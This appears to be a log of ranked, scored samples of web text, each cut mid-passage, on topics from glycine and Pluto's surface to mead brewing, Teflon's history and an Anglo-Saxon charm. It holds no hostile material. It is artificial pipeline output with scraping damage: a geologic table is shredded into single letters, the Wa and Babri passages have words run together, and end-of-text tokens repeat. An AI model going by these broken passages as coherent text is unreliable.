It is encoded by all the codons starting with GG (GGU, GGC, GGA, GGG). Glycine is also known as a "helix breaker". + +Glycine is a colorless, sweet-tasting crystalline solid. It is the only achiral proteinogenic amino acid. It can fit into hydrophilic or hydrophobic environments, due to its minimal side chain of only one hydrogen atom. The acyl radical is glycyl. + +Glycine is a white crystalline solid + +History and etymology [ edit ] + +Glycine was discovered in 1820 by the French chemist Henri Braconnot when he hydrolyzed gelatin by boiling it with sulfuric acid.[6] He originally called it "sugar of gelatin",[7][8] but the French chemist Jean-Baptiste Boussingault showed that it contained nitrogen.[9] The American scientist Eben Norton Horsford, then a student of the German chemist Justus von Liebig, proposed the name "glycocoll";[10][11] however, the Swedish chemist Berzelius suggested the simpler name "glycine".[12][13] The name comes from the Greek word γλυκύς "sweet tasting"[14] (which is also related to the prefixes glyco- and gluco-, as in glycoprotein and glucose). In 1858, the French chemist Auguste Cahours determined that glycine was an amine of acetic acid.[15] + +Production [ edit ] + +Although glycine can be isolated from hydrolyzed protein, this is not used for industrial production, as it can be manufactured more conveniently by chemical synthesis.[16] The two main processes are amination of chloroacetic acid with ammonia, giving glycine and ammonium chloride,[17] and the Strecker amino acid synthesis,[18] which is the main synthetic method in the United States and Japan.[19] About 15 thousand tonnes are produced annually in this +================================================================================ +Rank = 58; Score = 864256.0 +<|begin_of_text|>The dark color of the region is speculated to be the result of a "tar" made of complex hydrocarbons called tholins covering the surface, which form from methane and nitrogen in the atmosphere interacting with ultraviolet light and cosmic rays.[5][6][7] Tholins have been observed on other planetary bodies, such as Iapetus, Umbriel, and in the atmosphere of Titan, although the irregular and disconnected nature of the dark spots on Pluto has not yet been explained.[5] The presence of craters within Cthulhu indicates that it is perhaps billions of years old, in contrast to the adjacent bright, craterless Sputnik Planitia, which may be as little as 100 million years old;[8] however, some areas of Cthulhu Macula are smoother and much more modestly cratered, and may be intermediate in age. The western 'head' region consists mostly of heavily cratered 'alpine' terrain. The middle part of Cthulhu Macula is meanwhile a smooth plain, probably formed through large cryovolcanic eruptions, like Vulcan Planum on Charon. This part appears to be younger than the alpine terrain to the east, but there are nevertheless several large craters located in this region. The western 'tail' region of Cthulhu Macula was imaged in much lower resolution than the eastern part, but it can be inferred that this is a hilly landscape bordered by mountains to the west.[9][10][11] Higher-resolution images of the border between the two regions indicate that lighter material from Sputnik Planitia, composed of nitrogen, carbon monoxide, and methane ices, may be invading and overlaying the easternmost part of the dark Cthulhu Macula.[12] As of 30 July 2015, the eastern "head" region had been imaged in much higher resolution than the western "tail" region.[13] + +The "head" region of the Cthulhu feature, with Sputnik Planitia at right + +The "tail" region of Cthulhu, at the bottom of this image. The "head" extends beyond the right side of the visible portion of Pluto. Meng-P'o is visible at the extreme bottom left. + +This image shows a region at the border between Cthulhu's "head" (left) and the light, flat Sputnik Planitia (right), with Hillary Montes at center. + +The white snow caps +================================================================================ +Rank = 59; Score = 843776.0 +<|begin_of_text|>Scientists believe that the first alcoholic beverage ever made was a combination of honey, and perhaps grains, that wild yeast and bacteria fermented spontaneously. Someone along the way decided to drink said beverage and voila! + +This honey wine/ beer mashup was nothing akin to our modern understanding of mead or beer, but it was the foundation of some of the greatest beverages known to man. Over many years, the two have become distinct beverages. That’s probably because the official term for such a hybrid of beer and mead is braggot, and anything that rhymes with maggot was clearly not meant to be popular. + +At heart, mead, aka honey wine, is a truly simple beverage. It can be carbonated like beer, or kept still like a table wine. I have mostly preferred carbonated meads personally. If you let mead ferment fully, and do not add any additional sugars, which is my preference, you’ll end up with a delicious, champagne-like beverage (especially if you use a champagne yeast for fermentation). If you’ve never tried mead, I’d recommend trying offerings from RedStone and B Nektar – both excellent mead makers. + +The basic mead recipe is honey, yeast, and enough water to reach the brewer’s desired gravity, or sugar concentration. Frequently mead home-brewers will also add a Yeast Nutrient since honey doesn’t have the same inherent nutrients that malts do for beer which ensure active and healthy fermentation. + +I decided to make mead last year after reading one of many brewing books I own, specifically, The Brewer’s Apprentice, written by none other than Greg Koch of Stone Brewing, and Matt Allyn, an award winning home brewer and Certified Beer Judge. Chapter 16 of the book is dedicated to mead, and though I had only tried it a handful of times, I got to thinking this would be a fun experiment. + +Since we were mead-brewing virgins, me and the hubs liked the idea of trying a few ‘recipes’. We purchased five 1 gallon fermentors and made small batches using a variety of honeys, specifically Mesquite Desert honey from Trader Joe’s, local raw honey, plus wildflower, buckwheat, and orange blossom honey from Deer Creek Honey Farms. + +You’d think all honeys would taste rather similar but there really is a huge difference in the flavor of honeys from different locations and which plants they pollinate. Mesquite honey is a bit spicy, while the orange blossom is citrusy +================================================================================ +Rank = 60; Score = 839680.0 +<|begin_of_text|>The first geologic time scale was proposed in 1913 by the British geologist Arthur Holmes (1890 - 1965). This was soon after the discovery of radioactivity, and using it, Holmes estimated that the Earth was about 4 billion years old - this was much greater than previously believed. + +EON ERA PERIOD EPOCH PIVOTAL EVENTS + +P + +h + +a + +n + +e + +r + +o + +z + +o + +i + +c + +E + +o + +n + +"Visible Life" + +Organisms with skeletons or hard shells. + +540 mya through today. + +P + +h + +a + +n + +e + +r + +o + +z + +o + +i + +c + +E + +o + +n + +"Visible Life" + +Organisms with skeletons or hard shells. + +540 mya through today. + +P + +h + +a + +n + +e + +r + +o + +z + +o + +i + +c + +E + +o + +n + +"Visible Life" + +Organisms with skeletons or hard shells. + +540 mya through today. + +P + +h + +a + +n + +e + +r + +o + +z + +o + +i + +c + +E + +o + +n + +"Visible Life" + +Organisms with skeletons or hard shells. + +540 mya through today. Cenozoic Era + +"The Age of Mammals" + +65 mya through today Quaternary Period + +"The Age of Man" + +1.8 mya to today Holocene + +11,000 ya to today Human civilization + +Pleistocene + +The Last Ice Age + +1.8-.011 mya The first humans (Homo sapiens) evolve. Mammoths, mastodons, saber-toothed cats, giant ground sloths, and other Pleistocene megafauna. A mass extinction of large mammals and many birds happened about 10,000 years ago, probably caused by the end of the last ice age. + +Tertiary Period + +65 to 1.8 mya Neogene + +24-1.8 mya Pliocene + +5-1.8 mya First hominids (australopithecines). Modern forms of whales. Megalodon swam the seas + +Miocene + +24-5 mya More mammals, including the horses, dogs and bears. Modern birds. South American monkeys, apes in southern Europe, Ramapithecus. + +Paleogene + +65-24 mya Oligocene + +38-24 mya Starts with a minor extinction (36 my +================================================================================ +Rank = 61; Score = 815104.0 +<|begin_of_text|>Blaming nature for the CO2 rise doesn't add up + +Posted on 14 August 2011 by MarkR + +Recently there’s been a resurgence in claims that CO 2 rise is caused by 'natural' temperature rise rather than humans. Various arguments are used to make this sound sensible (see Paolo Soares, Murry Salby and Joe Bastardi), but they’re wrong. + +I’m going to pick on just one of the claims Joe Bastardi made in a comment at Tamino’s blog and this is written as an explanation to Joe of why I’m convinced he’s wrong. I hope readers will be able to point out if I’ve made a mistake and work out which argument you think makes the most sense. Bastardi claims that: + +“The answer is obvious. it is the earths temperature which is driving the co2 release into the atmosphere.” + +I’m going to start with chemistry; most carbon in the atmosphere is in CO2 and it can move between the atmosphere and land/oceans through chemical reactions. Billions of tons of carbon don't magically turn into pixie dust. + +Next some maths: if I have one ton of carbon and I add another ton of carbon then I have two. We can write this down as an equation for the change in atmospheric CO 2 over a year, ΔC atm : + +This says that if I ‘emit’ a ton of carbon by, say, triggering a volcano then the atmosphere will gain a ton. If I ‘absorb’ a ton of carbon by growing a tree, then the atmosphere loses a ton. + +We can expand the equation by counting human emissions (HE) and absorption (HA) and natural emissions (NE) and absorption (NA) separately. + +This works because carbon is additive. If a volcano emits a ton of carbon and a factory emits a ton then the atmosphere has gained two tons. This is a very simple balance sheet for the carbon cycle and fortunately there are ‘accountants’ who’ve measured some of these values for us. + +Recently the amount of CO2 in the atmosphere has been rising at ~2 parts per million per year, or around 15 billion tons/year. Meanwhile human emissions excluding land use change (like clearing or planting forests) are 30 billion tons per year. In billions of tons per year we have: + +We can rearrange this: + +Humans are also clearing rainforests and changing land use, but here I'll assume that human effects on absorption (HA) are not much different from zero, i.e. + +So Natural Absorption ( +================================================================================ +Rank = 62; Score = 811008.0 +<|begin_of_text|>Wō or Wa, formed by the "person" radical 亻and a wěi or wa 委 phonetic element Chinese character foror, formed by the "person" radical 亻and aorphonetic element + +Wa (倭, "Japan, Japanese", from Chinese 倭 Wō or Wa) is the oldest recorded name of Japan. The Chinese as well as Korean and Japanese scribes regularly wrote it in reference to Yamato (ancient Japanese nation) with the Chinese character 倭 until the 8th century, when the Japanese replaced it with 和 "harmony, peace, balance." + +Damyeom-ripbon-wang-heedo (唐閻立本王會圖). 6th century, China. Envoys visiting the Tang Emperor. From left to right: Wa, Silla, Baekje ambassadors + +Historical references [ edit ] + +The earliest textual references to Japan are in Chinese classic texts. Within the official Chinese dynastic Twenty-Four Histories, Japan is mentioned among the so-called Dongyi 東夷 "Eastern Barbarians". Note that the following texts are chronologically ordered by date of compilation, which does not always correspond with the sequence of Dynasties in Chinese history. In traditional Chinese units of measurement, distance is recorded in lǐ 里, which varied among dynastic standards, roughly equivalent to 300–400 meters. Ryūsaku Tsunoda (1951:4) cautions that great distances in thousands of lǐ "are, of course, not to be taken literally." + +The historian Wang Zhenping summarizes Wo contacts with the Han State. + +When chieftains of various Wo tribes contacted authorities at Lelang, a Chinese commandery established in northern Korea in 108 B.C. by the Western Han court, they sought to benefit themselves by initiating contact. In A.D. 57, the first Wo ambassador arrived at the capital of the Eastern Han court (25-220); the second came in 107. Wo diplomats, however, never called on China on a regular basis. A chronology of Japan-China relations from the first to the ninth centuries reveals this irregularity in the visits of Japanese ambassadors to China. There were periods of frequent contacts as well as of lengthy intervals between contacts. This irregularity clearly indicated that, in its diplomacy with China, Japan set its own agenda and acted on self-interest to satisfy its own needs. No Wo ambassador, for example, came to China during the second century +================================================================================ +Rank = 63; Score = 806912.0 +<|begin_of_text|>× Hubble captures triple solar eclipse on Jupiter + +(CNN) — The Hubble space telescope peers hundreds, thousands, millions of light years into the universe to study novas, quasars and nebulas. + +But weeks ago, it pulled its focus way in close — to just light minutes away — to view a rare and beautiful spectacle at the planet Jupiter. + +Three big moons crossed past it at the same time, casting their shadows onto Jupiter’s swirling surface. + +From the perspective of people theoretically standing down on Jupiter, it would be like three solar eclipses happening at once, astronomers said. + +A photo gift + +In the last 15 years, this has happened only twice, the Space Telescope Science Institute said. “The next one will be 2032,” said astronomer Carol Christian. + +So, Hubble shot photos rapid fire to capture the rare conjunction in late January. And STScI published them on Thursday, along with a short fast-motion video animation. + +There was no great scientific gain in Hubble taking the snaps. The moons and their crossings have been examined plenty and are well known. + +“We felt that there are images which have aesthetic value above and beyond their scientific value,” said astronomer Zolt Levy. + +It was a gift of beauty to the public. + +62 moons, 4 big ones + +Jupiter is a sort of mini-solar system inside our solar system. + +It’s the largest body after the sun. And like the sun, it comprises a lot of helium and hydrogen gas, but it doesn’t have enough mass to burst into the intense nuclear fusion that makes the sun a fireball, NASA says. + +It has many satellites, including 62 moons, and they swarm around the planet with many of them crossing the surface facing Earth constantly. + +But only four of them are highly visible standouts. They are Io, Europa, Ganymede and Callisto. + +Just like Galileo + +The four moons are called the Galilean satellites, because Renaissance astronomer Galileo Galilei discovered them in 1610, when he pointed his telescope skyward, forever changing human perception of our place in the cosmos. + +Many of today’s hobby telescopes are much stronger than his, so anyone can easily follow in his footsteps and cast the same gaze. + +And many did, when the three moons passed, posting their recordings of the triple moon transit on YouTube. + +The moons spin around Jupiter at different speeds; their orbits vary in duration from two to 17 days, so having them line up together to zip across the side of +================================================================================ +Rank = 64; Score = 806912.0 +<|begin_of_text|>In thermodynamics, the triple point of a substance is the temperature and pressure at which the three phases (gas, liquid, and solid) of that substance coexist in thermodynamic equilibrium.[1] It is that temperature and pressure at which the sublimation curve, fusion curve and the vaporisation curve meet. For example, the triple point of mercury occurs at a temperature of −38.83440 °C and a pressure of 0.2 mPa. + +In addition to the triple point for solid, liquid, and gas phases, a triple point may involve more than one solid phase, for substances with multiple polymorphs. Helium-4 is a special case that presents a triple point involving two different fluid phases (lambda point).[1] + +The triple point of water was used to define the kelvin, the base unit of thermodynamic temperature in the International System of Units (SI).[2] The value of the triple point of water was fixed by definition, rather than measured, but that changed with the 2019 redefinition of SI base units. The triple points of several substances are used to define points in the ITS-90 international temperature scale, ranging from the triple point of hydrogen (13.8033 K) to the triple point of water (273.16 K, 0.01 °C, or 32.018 °F). + +The term "triple point" was coined in 1873 by James Thomson, brother of Lord Kelvin.[3] + +Triple point of water [ edit ] + +Gas–liquid–solid triple point [ edit ] + +A typical phase diagram. The solid green line applies to most substances; the dashed green line gives the anomalous behavior of water + +The single combination of pressure and temperature at which liquid water, solid ice, and water vapor can coexist in a stable equilibrium occurs at exactly 273.1600 K (0.0100 °C; 32.0180 °F) and a partial vapor pressure of 611.657 pascals (6.11657 mbar; 0.00603659 atm).[4][5] At that point, it is possible to change all of the substance to ice, water, or vapor by making arbitrarily small changes in pressure and temperature. Even if the total pressure of a system is well above the triple point of water, provided that the partial pressure of the water vapor is 611.657 pascals, then the system can still be brought to the triple point of water. Strictly speaking, the surfaces +================================================================================ +Rank = 65; Score = 782336.0 +<|begin_of_text|>This article is about air conditioning. For similar concept in atomic physics, see Evaporative cooling (atomic physics) + +An evaporative cooler (also swamp cooler, swamp box, desert cooler and wet air cooler) is a device that cools air through the evaporation of water. Evaporative cooling differs from typical air conditioning systems, which use vapor-compression or absorption refrigeration cycles. Evaporative cooling uses the fact that water will absorb a relatively large amount of heat in order to evaporate (that is, it has a large enthalpy of vaporization). The temperature of dry air can be dropped significantly through the phase transition of liquid water to water vapor (evaporation). This can cool air using much less energy than refrigeration. In extremely dry climates, evaporative cooling of air has the added benefit of conditioning the air with more moisture for the comfort of building occupants. + +The cooling potential for evaporative cooling is dependent on the wet-bulb depression, the difference between dry-bulb temperature and wet-bulb temperature (see relative humidity). In arid climates, evaporative cooling can reduce energy consumption and total equipment for conditioning as an alternative to compressor-based cooling. In climates not considered arid, indirect evaporative cooling can still take advantage of the evaporative cooling process without increasing humidity. Passive evaporative cooling strategies can offer the same benefits of mechanical evaporative cooling systems without the complexity of equipment and ductwork. + +Overview [ edit ] + +qanat, used for evaporative cooling of buildings Schematic diagram of an ancient Iranian windcatcher and, used for evaporative cooling of buildings + +An earlier form of evaporative cooling, the windcatcher, was first used in ancient Egypt and Persia thousands of years ago in the form of wind shafts on the roof. They caught the wind, passed it over subterranean water in a qanat and discharged the cooled air into the building. Modern Iranians have widely adopted powered evaporative coolers (coolere âbi).[1] + +The evaporative cooler was the subject of numerous US patents in the 20th century; many of these, starting in 1906,[2] suggested or assumed the use of excelsior (wood wool) pads as the elements to bring a large volume of water in contact with moving air to allow evaporation to occur. A typical design, as shown in a 1945 patent, includes a water reservoir (usually with level controlled by a float valve), a pump to circulate water over the excelsior pads and +================================================================================ +Rank = 66; Score = 774144.0 +<|begin_of_text|>NASA Technology + +Building on work he and his companies did with Johnson Space Center’s In Situ Resource Utilization (ISRU) team, Robert Zubrin has developed and commercialized technologies that could prove revolutionary in their Earth applications, such as a system that could extract millions of barrels of oil from defunct oil wells around the world and another that can harness all the natural gas currently burned off as waste at many oil drilling rigs (Spinoff 2015). + +But when he’s not working to change this world or colonize others, the president of Pioneer Astronautics, Pioneer Energy, and the Mars Society enjoys a good microbrew. Now, he’s applied some of that same technology to cut costs for craft breweries that produce anywhere between 3,000 and 300,000 barrels per year. + +Beginning in the mid-1990s, as a NASA contractor and then as founder of Pioneer Aeronautics, Zubrin worked with Johnson’s ISRU team to develop technology that could break down elements that are abundant on Mars and turn them into essential resources for exploration missions. Early work devised means to capture the carbon dioxide (CO2) that comprises more than 95 percent of the thin Martian atmosphere and turn it into oxygen and fuel. He built systems that could, for example, collect and separate CO2 from other gases, raise its pressure by two orders of magnitude, combine it with hydrogen to make methane and water, break the water down into oxygen and hydrogen, and remove water vapor from the resulting oxygen before it was stored. + +Some of this technology, such as systems that manipulate temperature and pressure to liquefy and store gases or to strip water from a gas, as well as the technology that allows such systems to run autonomously, has found its way into Lakewood, Colorado-based Pioneer Energy’s latest creation, the CO2 Craft Brewery Recovery System. + +Technology Transfer + +“When you ferment beer, the process that produces alcohol also produces carbon dioxide,” Zubrin explains, noting that CO2 is also necessary later, to carbonate the beverage. + +Major breweries typically have systems that capture the carbon dioxide produced during fermentation for use in carbonation and other functions, such as purging process tanks. These are high-capacity, multimillion-dollar systems, however, and don’t make sense for a small craft brewery. “They don’t have the capacity to liquefy the carbon dioxide that comes off their fermenters to put it into the beer,” Zubrin says. Instead, microbreweries are left to release the gas from fermentation and buy carbon dioxide from +================================================================================ +Rank = 67; Score = 770048.0 +<|begin_of_text|>Figure 1: Left: Skyrmions are whirling patterns in the magnetic orientations of atoms. Under an external magnetic field (purple arrows), atoms on the outside of the skyrmion align their magnetic moments (red) with the field, while those at the core of the skyrmion point in the opposite direction (blue). Right: Skyrmions can stack up to form a triangular (‘honeycomb’) or square lattice. Reprinted by permission from Macmillan Publishers Ltd: Nature Materials (Ref. 1), copyright (2017). + +Tiny swirling magnetic patterns called skyrmions (Fig. 1, left) can pack together to form neat lattices inside certain magnetic materials. These lattices are promising for spintronics—a new form of computing that exploits the magnetic characteristics of atoms to manage data. But their usefulness is limited because they typically exist only within a narrow window of temperatures and magnetic fields. + +Now, Kosuke Karube of the RIKEN Center for Emergent Matter Science and colleagues have discovered that skyrmion lattices in a crystalline cobalt−zinc−manganese alloy can survive over a wide range of temperatures and magnetic fields, pointing the way to practical skyrmion-based spintronics1. + +Each of the three metals—cobalt, zinc and manganese—in the alloy has unique magnetic properties that influence the material’s magnetism. Below 27 degrees Celsius, the alloy can assume several different magnetic states, which Karube’s team mapped using techniques such as neutron scattering. + +Between 11 and 27 degrees Celsius, a stable honeycomb lattice of skyrmions (Fig. 1, top right) formed when a small magnetic field was applied. But when the temperature dropped below 11 degrees Celsius, the skyrmion lattice was no longer in the most energetically stable state. Instead, very slow cooling caused each atom to orient its magnetism so that it was slightly out of alignment with its neighbors, which collectively formed spirals in the crystal’s intrinsic magnetism. These spirals come in two forms, known as helical and conical magnetic states. + +However, relatively rapid cooling prevented these states from occurring and preserved the honeycomb skyrmion lattice in a higher-energy ‘metastable’ state. This lattice was stable enough to last indefinitely below –13 degrees Celsius under a broad range of magnetic fields. + +Below about –123 degrees Celsius, the lattice began to change shape to form a square lattice, which had never been seen before (Fig. +================================================================================ +Rank = 68; Score = 770048.0 +<|begin_of_text|>One of the two big players in the asteroid mining market, Deep Space Industries, today unveiled its plan to land a 110-pound spacecraft on a near-Earth asteroid by 2020. + +The spacecraft, known as Prospector-1, would study the yet-to-be-selected asteroid to determine the value of its resources for mining. It’ll also put Deep Space Industries’ water-based propulsion system to an interplanetary test. + +“Deep Space Industries has worked diligently to get to this point, and now we can say with confidence that we have the right technology, the right team and the right plan to execute this historic mission,” Rick Tumlinson, DSI’s board chairman and co-founder, said in a news release. + +California-based DSI and its partners in Luxembourg say they’ll launch a precursor satellite called Prospector-X into low Earth orbit next year to test the technologies that would be used for Prospector-1. + +DSI sees near-Earth asteroids as potentially valuable sources for materials ranging from plain old water ice – which can be processed into breathable oxygen and drinkable water as well as propellant – to in-space building materials and precious metals. + +If DSI sticks to its schedule, Prospector-1 could become the first commercial asteroid mining exploration mission. However, Planetary Resources, which is based in Redmond, Wash., is also taking aim at asteroids. + +Planetary Resources had its first precursor spacecraft, Arkyd-3R, deployed into orbit for a five-month test mission last year. A larger spacecraft, the Arkyd-6A, is being readied for launch later this year and will observe Earth in infrared wavelengths as a practice round for asteroid prospecting. + +Planetary Resources says its next-generation space telescopes, known as the Arkyd 100 and Arkyd 200, could start studying the composition of near-Earth asteroids in the 2017-2019 time frame. At the same time, the company plans to create a constellation of Earth-observing satellites known as Ceres. + +If suitable targets are identified, Planetary Resources could begin extracting materials from asteroids by the mid-2020s, according to the company’s president and CEO, Chris Lewicki. + +Planetary Resources has raised tens of millions of dollars since its founding in 2012. Deep Space Industries was founded a year later, and has raised an undisclosed amount of seed money from investors including Metatron Global. Both companies have forged partnerships with Luxembourg’s government as part of that European nation’s SpaceResources.lu initiative +================================================================================ +Rank = 69; Score = 757760.0 +<|begin_of_text|>NASA/ESA/the Hubble Heritage Team (STScI/AURA) + +A photogenic and favorite target for amateur astronomers, the full beauty of nearby barred spiral galaxy M83 is unveiled in all of its glory in this Hubble Space Telescope mosaic image. The vibrant magentas and blues reveal that the galaxy is ablaze with star formation. The galaxy, also known as the Southern Pinwheel, lies 15 million light-years away in the constellation Hydra. + +The Hubble photograph captures thousands of star clusters, hundreds of thousands of individual stars, and “ghosts” of dead stars called supernova remnants. The galactic panorama unveils a tapestry of the drama of stellar birth and death spread across 50,000 light-years. + +The newest generations of stars are forming largely in clusters on the edges of the dark spiral dust lanes. These brilliant young stellar groupings, only a few million years old, produce huge amounts of ultraviolet light that is absorbed by surrounding diffuse gas clouds, causing them to glow in pinkish hydrogen light. + +Gradually, the fierce stellar winds from the youngest most massive stars blow away the gas, revealing bright blue star clusters and giving a “Swiss cheese” appearance to the spiral arms. These youngest star clusters are about 1 million to 10 million years old. The populations of stars up to 100 million years or older appear yellow or orange by comparison because the young blue stars have already burned out. + +Interstellar “bubbles” produced by nearly 300 supernovas from massive stars have been found in this Hubble image. By studying these supernova remnants, astronomers can better understand the nature of the stars that exploded and dispersed nuclear processed chemical elements back into the galaxy, contributing to the next generation of new stars. + +This image is being used to support a citizen science project titled STAR DATE: M83. The primary goal is to estimate ages for approximately 3,000 star clusters. Amateur scientists will use the presence or absence of the pink hydrogen emission, the sharpness of the individual stars, and the color of the clusters to estimate ages. Participants will measure the sizes of the star clusters and any associated emission nebulae. Finally, the citizen scientists will “explore” the image, identifying a variety of objects ranging from background galaxies to supernova remnants to foreground stars.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 70; Score = 745472.0 +<|begin_of_text|>Aligned carbon nanotube/graphene sandwiches for high-rate lithium-sulfur batteries + +(Nanowerk Spotlight) Sp 2 -bonded carbon nanomaterials – such as carbon nanotubes (CNTs) and graphene – have attracted enormous research interest over the past decades. Due to their superior intrinsic physical properties, such as mechanical strength, electrical and thermal conductivity, these nanocarbons find numerous applications in areas such as catalysis, energy storage or nanocomposites. In addition to these intrinsic physical properties, what makes these materials so attractive are their tunable chemical characters, such as functional groups, doping, and surface modification. + +However, the demonstration of their intrinsic physical properties and performances in as-fabricated materials and practical devices has been suffering from the self-aggregation and re-stacking of nanocarbon materials due to strong van der Waals interactions. This prevents the full utilization of the active sites for catalytic reactions. + +Researchers consider the rational combination of CNTs and graphene into three-dimensional (3D) hybrids an effective route to amplify the inherent physical properties at the macroscale. From post-treatment methods to in situ growth, various strategies have been explored to fabricate such CNTs/graphene hybrids. Most of these approaches, though, still require barrier layers, which hinders the full demonstration of the excellent properties of these hybrid materials. + +By in situ nitrogen doping and structural hybridization of carbon nanotubes and graphene, a team from Tsinghua University, led by professors Qiang Zhang and Fei Wei, have now successfully fabricated nitrogen-doped aligned carbon nanotube/graphene (N-ACNT/G) sandwiches. In this work, aligned CNTs and graphene layers were anchored to each other, constructing a sandwich-like hierarchical architecture with efficient 3D electron transfer pathways and ion diffusion channels. + +The researchers have published their findings in Advanced Materials ("Nitrogen-Doped Aligned Carbon Nanotube/Graphene Sandwiches: Facile Catalytic Growth on Bifunctional Natural Catalysts and Their Applications as Scaffolds for High-Rate Lithium-Sulfur Batteries"). + +Conceptual scheme of the design of N-ACNT/G hybrids with graphene and aligned CNTs as building blocks. (a) Structural hybridization of aligned CNTs and graphene via catalytic growth on bifunctional natural catalysts; (b) In situ nitrogen doping for moderate chemical modification of the carbon scaffolds. (Reprinted with permission by Wiley-VCH Verlag) + +"We used lamellar +================================================================================ +Rank = 71; Score = 745472.0 +<|begin_of_text|>Making Teflon Stick + +(This article appeared in Invention & Technology magazine, Summer 2000 www.americanheritage.com and I highly recommend the magazine + +One of the most versatile and familiar products of American chemical engineering, Teflon, was discovered by accident. There are many such tales to be found in the history of industrial chemistry, from vulcanized rubber to saccharin to Post-Its, all of which were stumbled upon by researchers looking for other things. So common, in fact, are unplanned discoveries of this sort that one might expect would-be inventors to simply mix random chemicals all day long until they come up with something valuable. Yet the circumstances behind the Teflon story show how each step along the way drew on the skills and talents of workers who were trained to nurture such discoveries and take them from the laboratory to the market. Teflon was developed at Du Pont, the source of many twentieth-century chemical innovations. It came about as a byproduct of the firm’s involvement with refrigerants. In the early 1930s a pair of General Motors chemists, A. L. Henne and Thomas Midgley, brought samples of two compounds to the Jackson Laboratory at Du Pont’s Chambers Works in Deepwater, New Jersey. The compounds, called Freon 11 and Freon 12, were chlorofluorocarbons (CFCs)—hydrocarbons in which some or all of the hydrogen was replaced with chlorine or fluorine. GM’s research laboratories had developed the family of Freons for its Frigidaire division, which made refrigeration equipment. They were meant to replace existing refrigerants such as ammonia, sulfur dioxide, and propane, which were less efficient than Freons and either too poisonous or too explosive for residential use. + +Having made the basic discovery, GM teamed up with Du Pont to take advantage of the latter’s expertise in manufacturing and research and development. The two companies formed a joint venture called Kinetic Chemicals, which by the mid-1930s had isolated and tested a wide range of CFCs and put the most promising ones into mass production. The best seller was refrigerant 114 (later called Freon 114), or retrafluorodichloroethane (CF 2 C l CF 2 C l ). Kinetic had agreed to reserve its entire output of Freon 114 for Frigidaire, so in the late 1930s Du Pont was looking for an equally effective refriger +================================================================================ +Rank = 72; Score = 741376.0 +<|begin_of_text|>A group of researchers led by Dr Stuart Licht of George Washington University has developed a novel method to economically convert atmospheric carbon dioxide directly into highly valued carbon nanofibers. + +“We have found a way to use atmospheric carbon dioxide to produce high-yield carbon nanofibers. Such nanofibers are used to make strong carbon composites, such as those used in the Boeing 787 Dreamliner, as well as in high-end sports equipment, wind turbine blades and a host of other products,” Dr Licht explained. + +Because of its efficiency, the new process can be run using only a few volts of electricity, sunlight and a whole lot of carbon dioxide. + +At its root, the system uses electrolytic syntheses to make the nanofibers. + +Carbon dioxide is broken down in a high-temperature electrolytic bath of molten carbonates at 1,380 degrees Fahrenheit (750 degrees Celsius). Atmospheric air is added to an electrolytic cell. + +“Once there, carbon dioxide dissolves when subjected to the heat and direct current through electrodes of nickel and steel. The carbon nanofibers build up on the steel electrode, where they can be removed,” Dr Licht said. + +To power the syntheses, heat and electricity are produced through a hybrid and extremely efficient concentrating solar-energy system. + +The system focuses the Sun’s rays on a photovoltaic solar cell to generate electricity and on a second system to generate heat and thermal energy, which raises the temperature of the electrolytic cell. + +The scientists estimate electrical energy costs of this ‘solar, thermal, electrochemical process’ to be around $1,000 per ton of carbon nanofiber product, which means the cost of running the system is hundreds of times less than the value of product output. + +“We calculate that with a physical area less than 10% the size of the Sahara Desert, our process could remove enough carbon dioxide to decrease atmospheric levels to those of the pre-industrial revolution within ten years,” Dr Licht said. + +At this time, the system is experimental. “We are scaling up quickly and soon should be in range of making tens of grams of nanofibers an hour,” Dr Licht said. + +One advance the researchers have recently achieved is the ability to synthesize carbon fibers using even less energy than when the process was initially developed. + +“Carbon nanofiber growth can occur at less than 1 volt at 1,380 degrees Fahrenheit (750 degrees Celsius), which for example is much less than the 3-5 volts used in the 1,832 degrees Fahrenheit +================================================================================ +Rank = 73; Score = 733184.0 +<|begin_of_text|>mæsse,'mass', and it may have been a day when + +mæsse + +Harvest, from an Anglo-Saxon calendar for August (BL Cotton MS Tiberius B V/1, f. 6v) + +[...] lange sticcan feðerecgede 7 writ on ægðerne sticcan[...] ælcere ecge an pater noster oð ende 7 lege þone [...]an þam berene on þa flore 7 þone oðerne on [...] ofer þam oðrum sticcan. þæt þær si rode tacen on 7 nim of ðam gehalgedan hlafe þe man halgie on hlafmæssedæg feower snæda 7 gecryme on þa feower hyrna þæs berenes. þis is þeo bletsung þærto. Vt surices garbas non noceant has preces super garbas dicis et non dicto eos suspendis hierosolimam ciuitate. ubi surices nec habitent nec habent potestam. nec grana colligent. nec triticum congaudent. þis is seo oðer bletsung. Domine deus omnipotens qui fecisti celum et terram. tu benedicis fructum istum in nomine patris et spiritus sancti. amen. 7 Pater noster. + +[Take two] long pieces of four-edged wood, and on each piece write a Pater noster, on each side down to the end. Lay one on the floor of the barn, and lay the other across it, so that they form the sign of the cross. And take four pieces of the hallowed bread which is blessed on Lammas day, and crumble them at the four corners of the barn. This is the blessing for that; so that mice do not harm these sheaves, say prayers over the sheaves and do not cease from saying them. 'City of Jerusalem, where mice do not live they cannot have power, and cannot gather the grain, nor rejoice with the harvest.' This is the second blessing: 'Lord God Almighty, who made heaven and earth, bless these fruits in the name of the Father and the Holy Spirit.' Amen. And [then say] a Pater Noster. + +Quoted from Karen Louise Jolly, +================================================================================ +Rank = 74; Score = 733184.0 +<|begin_of_text|>Balbir Singh + +kar sevak + +Babri Masjid + +Mohammed Amir + +Masters in History + +Political Science + +Malegaon + +Mecca Masjid + +was awho participated in the razing of the. Today, as, his goal is to repair and rebuild 100 mosques.ByThe talk is of madness. The powerful hold it can take on one, and how the fear caused by the idea of madness can in itself be maddening.Mohammad Amir, physically nondescript, with a triple, and English, and an itinerant pilgrim, should know what he is talking about: Long ago, 25 years to be precise, he had a dalliance with insanity.We are sitting, deep into the night, in the well-carpeted office of one of 